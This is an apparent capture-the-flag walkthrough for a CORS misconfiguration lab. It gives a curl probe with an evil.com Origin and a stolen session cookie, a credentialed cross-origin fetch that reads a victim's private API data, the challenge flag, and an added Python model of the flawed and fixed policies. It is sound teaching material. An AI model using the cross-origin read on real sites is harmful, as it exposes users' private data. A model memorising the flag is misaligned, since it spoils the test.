hackr.gg — Official Walkthrough
Confidential · Educational Use Only

CritBook — CORS Misconfiguration

CORS Misconfiguration
Difficulty: Intermediate
Vuln class: CORS Misconfiguration
Steps: 3
// Objective
Exploit a CORS misconfiguration to read the victim's private API data from a cross-origin page.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Test CORS policy
Send a credentialed cross-origin request to the API and check the response headers.
Command / Input
curl http://TARGET/api/me -H "Origin: https://evil.com" -H "Cookie: session=sess_alice_token" -v 2>&1 | grep -i "access-control"
Output
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
A wildcard (*) combined with Allow-Credentials: true is refused by browsers, but reflecting the request's Origin header back verbatim gives any site the same read access and is almost as bad.
2. Craft the cross-origin exploit
Host a page on any origin that makes a credentialed fetch to the CritBook API. The reflected CORS header allows the response to be read.
Command / Input
fetch("http://TARGET/api/me", {credentials: "include"})
  .then(r => r.json())
  .then(d => console.log(d));
3. Retrieve the flag
The API response includes the user's private data and the flag.
Command / Input
curl http://TARGET/api/me -H "Cookie: session=sess_alice_token"
Output
{"user":"alice","flag":"HackrGG{c0rs_cr3d3nt14ls_st0l3n_cr1tb00k}","private_posts":[...]}
// Flag
Flag value
HackrGG{c0rs_cr3d3nt14ls_st0l3n_cr1tb00k}
In the /api/me response — readable cross-origin due to the reflected CORS header.
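The following is an added example, not code from the CritBook challenge or from hackr.gg. It models the two server-side policies behind step 1 (the reflect-any-origin bug beside an exact-allowlist fix) and adds a small audit helper that classifies the Access-Control-* lines the curl command prints. The origin names in TRUSTED_ORIGINS, the header sample and every function name are constructed for illustration.

```python
# Added example: model of a CORS policy decision plus an audit helper for the
# response headers seen in step 1. Not the challenge's own code; the trusted
# origins below are assumed values, not anything from the walkthrough.
from typing import Dict, List, Optional

# Constructed allowlist: only these exact origins may send credentialed requests.
TRUSTED_ORIGINS = frozenset({
    "https://critbook.example",
    "https://app.critbook.example",
})


def weak_cors_headers(origin: Optional[str]) -> Dict[str, str]:
    """The misconfiguration from the walkthrough: echo whatever Origin the
    browser sent and also allow credentials, so any site can read /api/me."""
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def hardened_cors_headers(origin: Optional[str]) -> Dict[str, str]:
    """Corrected policy: an exact string match against the allowlist decides
    whether the origin is echoed; unknown origins get no ACAO header at all.
    Vary: Origin is always set so a shared cache never hands one origin's
    grant to a different origin."""
    if origin is None:
        return {}
    # Exact comparison only. Prefix, suffix or regex checks are what let
    # "null", "https://critbook.example.evil.com" or
    # "https://evilcritbook.example" through.
    if origin not in TRUSTED_ORIGINS:
        return {"Vary": "Origin"}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def classify_cors(probe_origin: str, header_lines: List[str]) -> str:
    """Audit helper for the step 1 output. probe_origin is the Origin value
    sent in the request; it should be one the API has no reason to trust, so
    that an echo of it is unambiguously a reflection rather than an allowlist
    hit. header_lines are the raw 'Name: value' lines grep printed."""
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    acao = headers.get("access-control-allow-origin")
    creds = headers.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        # Browsers will not expose a credentialed response under "*", so this
        # combination only ever leaks data that was public anyway.
        return "wildcard-credentials-ignored" if creds else "wildcard-public"
    if acao == probe_origin:
        # Reflected origin plus credentials is the finding from step 1.
        return "reflected-origin-with-credentials" if creds else "reflected-origin"
    return "fixed-origin"


if __name__ == "__main__":
    # Constructed sample: the two header lines from the step 1 curl output.
    sample = [
        "Access-Control-Allow-Origin: https://evil.com",
        "Access-Control-Allow-Credentials: true",
    ]
    print(classify_cors("https://evil.com", sample))
    print(weak_cors_headers("https://evil.com"))
    print(hardened_cors_headers("https://evil.com"))
    print(hardened_cors_headers("https://critbook.example"))
```

Running it classifies the constructed sample as reflected-origin-with-credentials, shows the weak policy echoing the untrusted origin, and shows the hardened policy answering the same origin with only Vary: Origin while still granting the allowlisted one.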